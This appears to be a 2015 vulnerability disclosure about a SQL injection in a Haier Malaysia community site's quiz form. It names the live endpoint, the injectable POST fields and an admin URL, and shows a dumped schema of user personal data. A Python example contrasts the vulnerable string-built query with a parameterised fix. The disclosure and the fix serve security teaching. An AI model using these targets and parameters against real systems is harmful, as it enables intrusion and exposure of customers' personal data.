2015-08-23: Details reported to the vendor, awaiting vendor handling. 2015-08-28: The vendor chose to ignore the vulnerability; details disclosed to the public.
As the title says.
POST injection.
URL: http://mycommunity.haier.com.my/home/submitform_quize
Data: question_id=111&question_textarea=111&user_id=0
Database: haiersocial
[30 tables]
+----------------------+
| answer               |
| banners              |
| categories           |
| events               |
| faq                  |
| fb_info              |
| gallery              |
| gallery_pic          |
| log_download         |
| log_view             |
| news_category        |
| news_product         |
| product_comment      |
| product_review       |
| products             |
| promotion_products   |
| purchases            |
| quiz                 |
| quiz_user_answer     |
| record_user          |
| shipping             |
| tag_faq_cat          |
| tag_prod_user_rating |
| tag_product_banner   |
| tag_user_rate        |
| users                |
| video_gallery        |
| video_gallery_video  |
| video_hub            |
| winner               |
+----------------------+
Database: haiersocial
Table: users
[27 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| accomodate        | varchar(50)  |
| address           | varchar(255) |
| city              | varchar(180) |
| country           | varchar(180) |
| created           | datetime     |
| email             | varchar(255) |
| enable            | tinyint(1)   |
| fb_id             | bigint(20)   |
| fname             | varchar(255) |
| house_income      | char(50)     |
| ic_no             | varchar(180) |
| id                | bigint(20)   |
| image             | varchar(255) |
| industry          | varchar(180) |
| invited_friends   | tinyint(1)   |
| is_like           | tinyint(1)   |
| lname             | varchar(255) |
| login_date        | datetime     |
| logout_date       | datetime     |
| marital_state     | tinyint(1)   |
| name              | varchar(255) |
| postcode          | char(50)     |
| purchased_product | tinyint(1)   |
| race              | char(50)     |
| state             | varchar(180) |
| tel               | char(50)     |
| term_of_use       | tinyint(1)   |
+-------------------+--------------+
As you can see, all kinds of user information is exposed: country, address, city, email, mobile number, name, telephone, and so on...
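The root cause is a form handler that splices the POST fields above straight into SQL. The following is an added illustration, not the site's own code: a constructed stand-in for the quiz submission handler, using an in-memory SQLite database, with the injectable version beside a hardened one that validates the numeric fields and binds the free-text field as a parameter (the quiz_user_answer table and its column names are assumed from the dumped schema).

```python
import re
import sqlite3

# Constructed schema: the real quiz_user_answer layout is not on the page,
# only the table name; the column names below are assumptions.
SCHEMA = """
CREATE TABLE quiz_user_answer (
    id INTEGER PRIMARY KEY,
    question_id INTEGER NOT NULL,
    user_id INTEGER NOT NULL,
    answer TEXT
);
"""


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def submit_vulnerable(conn, form):
    # Untrusted POST fields are formatted into the statement text, so any
    # quote or operator in them becomes part of the SQL instead of data.
    sql = ("INSERT INTO quiz_user_answer (question_id, user_id, answer) "
           "VALUES (%s, %s, '%s')" % (form["question_id"], form["user_id"],
                                      form["question_textarea"]))
    conn.execute(sql)
    conn.commit()


def submit_hardened(conn, form):
    # Integer-only fields are checked before use; the free-text answer is
    # passed as a bound parameter, so it can never change the statement.
    if not (re.fullmatch(r"\d+", form["question_id"])
            and re.fullmatch(r"\d+", form["user_id"])):
        raise ValueError("question_id and user_id must be integers")
    text = form["question_textarea"]
    if len(text) > 2000:
        raise ValueError("answer too long")
    conn.execute(
        "INSERT INTO quiz_user_answer (question_id, user_id, answer) "
        "VALUES (?, ?, ?)",
        (int(form["question_id"]), int(form["user_id"]), text),
    )
    conn.commit()


def stored_answers(conn):
    rows = conn.execute("SELECT question_id, user_id, answer "
                        "FROM quiz_user_answer ORDER BY id")
    return [tuple(r) for r in rows]
```

With the hardened handler an apostrophe in the answer is stored literally, while the concatenating handler turns the same input into a broken statement; in the live application that same property is what an injection tool exploits.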
Next step: dump the passwords~
Straight into the admin backend: http://mycommunity.haier.com.my/admin/products
Every backend function can be operated. Please don't treat this as a small vendor~
In summary:
You know.
Severity: No impact (vendor ignored)
Ignored at: 2015-08-28 14:14
Vulnerability Rank: 4 (WooYun rating)
None yet.